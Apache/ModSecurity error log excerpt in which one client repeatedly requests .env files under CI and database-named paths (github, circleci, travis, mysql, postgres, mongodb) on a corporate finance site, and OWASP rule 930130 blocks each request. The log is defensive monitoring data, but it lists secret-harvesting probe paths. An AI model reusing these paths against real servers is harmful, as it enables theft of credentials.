[Mon May 11 16:27:16.827201 2026] [security2:error] [pid 1411201:tid 1411257] [client 18.180.54.2:54106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/github/.env"] [unique_id "agHnRPy_GXSWIKeli0vyuwAAAIs"]
[Mon May 11 16:27:16.827429 2026] [security2:error] [pid 1411201:tid 1411257] [client 18.180.54.2:54106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/github/.env"] [unique_id "agHnRPy_GXSWIKeli0vyuwAAAIs"]
[Mon May 11 16:27:16.827903 2026] [core:error] [pid 1411201:tid 1411257] [client 18.180.54.2:54106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:16.828048 2026] [security2:error] [pid 1411201:tid 1411257] [client 18.180.54.2:54106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/github/.env"] [unique_id "agHnRPy_GXSWIKeli0vyuwAAAIs"]
[Mon May 11 16:27:17.266116 2026] [security2:error] [pid 1416109:tid 1416144] [client 18.180.54.2:54112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/circleci/.env"] [unique_id "agHnRVV4kyjgo4bQBUhVAwAAAM4"]
[Mon May 11 16:27:17.266300 2026] [security2:error] [pid 1416109:tid 1416144] [client 18.180.54.2:54112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/circleci/.env"] [unique_id "agHnRVV4kyjgo4bQBUhVAwAAAM4"]
[Mon May 11 16:27:17.266766 2026] [core:error] [pid 1416109:tid 1416144] [client 18.180.54.2:54112] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:17.266910 2026] [security2:error] [pid 1416109:tid 1416144] [client 18.180.54.2:54112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/circleci/.env"] [unique_id "agHnRVV4kyjgo4bQBUhVAwAAAM4"]
[Mon May 11 16:27:17.509032 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:54124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/actions/.env"] [unique_id "agHnRUWKUxpmnkK7zHx8dgAAAQk"]
[Mon May 11 16:27:17.509285 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:54124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/actions/.env"] [unique_id "agHnRUWKUxpmnkK7zHx8dgAAAQk"]
[Mon May 11 16:27:17.509814 2026] [core:error] [pid 1411055:tid 1411066] [client 18.180.54.2:54124] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:17.509970 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:54124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/actions/.env"] [unique_id "agHnRUWKUxpmnkK7zHx8dgAAAQk"]
[Mon May 11 16:27:17.990204 2026] [security2:error] [pid 1411201:tid 1411255] [client 18.180.54.2:54134] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/travis/.env"] [unique_id "agHnRfy_GXSWIKeli0vyvAAAAIk"]
[Mon May 11 16:27:17.990438 2026] [security2:error] [pid 1411201:tid 1411255] [client 18.180.54.2:54134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/travis/.env"] [unique_id "agHnRfy_GXSWIKeli0vyvAAAAIk"]
[Mon May 11 16:27:17.990913 2026] [core:error] [pid 1411201:tid 1411255] [client 18.180.54.2:54134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:17.991224 2026] [security2:error] [pid 1411201:tid 1411255] [client 18.180.54.2:54134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/travis/.env"] [unique_id "agHnRfy_GXSWIKeli0vyvAAAAIk"]
[Mon May 11 16:27:18.188225 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:54142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/circleci/.env"] [unique_id "agHnRjJnyuKVXoStDha1awAAAEA"]
[Mon May 11 16:27:18.188451 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:54142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/circleci/.env"] [unique_id "agHnRjJnyuKVXoStDha1awAAAEA"]
[Mon May 11 16:27:18.188945 2026] [core:error] [pid 1412074:tid 1412076] [client 18.180.54.2:54142] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:18.189111 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:54142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/circleci/.env"] [unique_id "agHnRjJnyuKVXoStDha1awAAAEA"]
[Mon May 11 16:27:18.728999 2026] [security2:error] [pid 1411201:tid 1411267] [client 18.180.54.2:45930] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/buildkite/.env"] [unique_id "agHnRvy_GXSWIKeli0vyvQAAAJY"]
[Mon May 11 16:27:18.729242 2026] [security2:error] [pid 1411201:tid 1411267] [client 18.180.54.2:45930] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/buildkite/.env"] [unique_id "agHnRvy_GXSWIKeli0vyvQAAAJY"]
[Mon May 11 16:27:18.729731 2026] [core:error] [pid 1411201:tid 1411267] [client 18.180.54.2:45930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:18.729881 2026] [security2:error] [pid 1411201:tid 1411267] [client 18.180.54.2:45930] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/buildkite/.env"] [unique_id "agHnRvy_GXSWIKeli0vyvQAAAJY"]
[Mon May 11 16:27:18.904081 2026] [security2:error] [pid 1412074:tid 1412097] [client 18.180.54.2:45940] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/travis/.env"] [unique_id "agHnRjJnyuKVXoStDha1bAAAAFU"]
[Mon May 11 16:27:18.904313 2026] [security2:error] [pid 1412074:tid 1412097] [client 18.180.54.2:45940] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/travis/.env"] [unique_id "agHnRjJnyuKVXoStDha1bAAAAFU"]
[Mon May 11 16:27:18.904779 2026] [core:error] [pid 1412074:tid 1412097] [client 18.180.54.2:45940] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:18.904922 2026] [security2:error] [pid 1412074:tid 1412097] [client 18.180.54.2:45940] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/travis/.env"] [unique_id "agHnRjJnyuKVXoStDha1bAAAAFU"]
[Mon May 11 16:27:19.429966 2026] [security2:error] [pid 1411055:tid 1411080] [client 18.180.54.2:45950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/mysql/.env"] [unique_id "agHnR0WKUxpmnkK7zHx8eAAAARc"]
[Mon May 11 16:27:19.430307 2026] [security2:error] [pid 1411055:tid 1411080] [client 18.180.54.2:45950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/mysql/.env"] [unique_id "agHnR0WKUxpmnkK7zHx8eAAAARc"]
[Mon May 11 16:27:19.431081 2026] [core:error] [pid 1411055:tid 1411080] [client 18.180.54.2:45950] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:19.431294 2026] [security2:error] [pid 1411055:tid 1411080] [client 18.180.54.2:45950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/mysql/.env"] [unique_id "agHnR0WKUxpmnkK7zHx8eAAAARc"]
[Mon May 11 16:27:19.605303 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.180.54.2:45952] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/buildkite/.env"] [unique_id "agHnR_y_GXSWIKeli0vyvgAAAIE"]
[Mon May 11 16:27:19.605529 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.180.54.2:45952] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/buildkite/.env"] [unique_id "agHnR_y_GXSWIKeli0vyvgAAAIE"]
[Mon May 11 16:27:19.606017 2026] [core:error] [pid 1411201:tid 1411247] [client 18.180.54.2:45952] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:19.606183 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.180.54.2:45952] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/buildkite/.env"] [unique_id "agHnR_y_GXSWIKeli0vyvgAAAIE"]
[Mon May 11 16:27:20.157300 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:45960] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/postgres/.env"] [unique_id "agHnSPy_GXSWIKeli0vyvwAAAIQ"]
[Mon May 11 16:27:20.157550 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:45960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/postgres/.env"] [unique_id "agHnSPy_GXSWIKeli0vyvwAAAIQ"]
[Mon May 11 16:27:20.158072 2026] [core:error] [pid 1411201:tid 1411250] [client 18.180.54.2:45960] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:20.158227 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:45960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/postgres/.env"] [unique_id "agHnSPy_GXSWIKeli0vyvwAAAIQ"]
[Mon May 11 16:27:20.324352 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:45974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mysql/.env"] [unique_id "agHnSFV4kyjgo4bQBUhVCAAAAMU"]
[Mon May 11 16:27:20.324584 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:45974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mysql/.env"] [unique_id "agHnSFV4kyjgo4bQBUhVCAAAAMU"]
[Mon May 11 16:27:20.325134 2026] [core:error] [pid 1416109:tid 1416135] [client 18.180.54.2:45974] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:20.325471 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:45974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mysql/.env"] [unique_id "agHnSFV4kyjgo4bQBUhVCAAAAMU"]
[Mon May 11 16:27:20.896410 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:45986] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/mongodb/.env"] [unique_id "agHnSA-Qm4vhlWBPlMi6hQAAABM"]
[Mon May 11 16:27:20.896629 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:45986] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/mongodb/.env"] [unique_id "agHnSA-Qm4vhlWBPlMi6hQAAABM"]
[Mon May 11 16:27:20.897284 2026] [core:error] [pid 1411099:tid 1411119] [client 18.180.54.2:45986] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
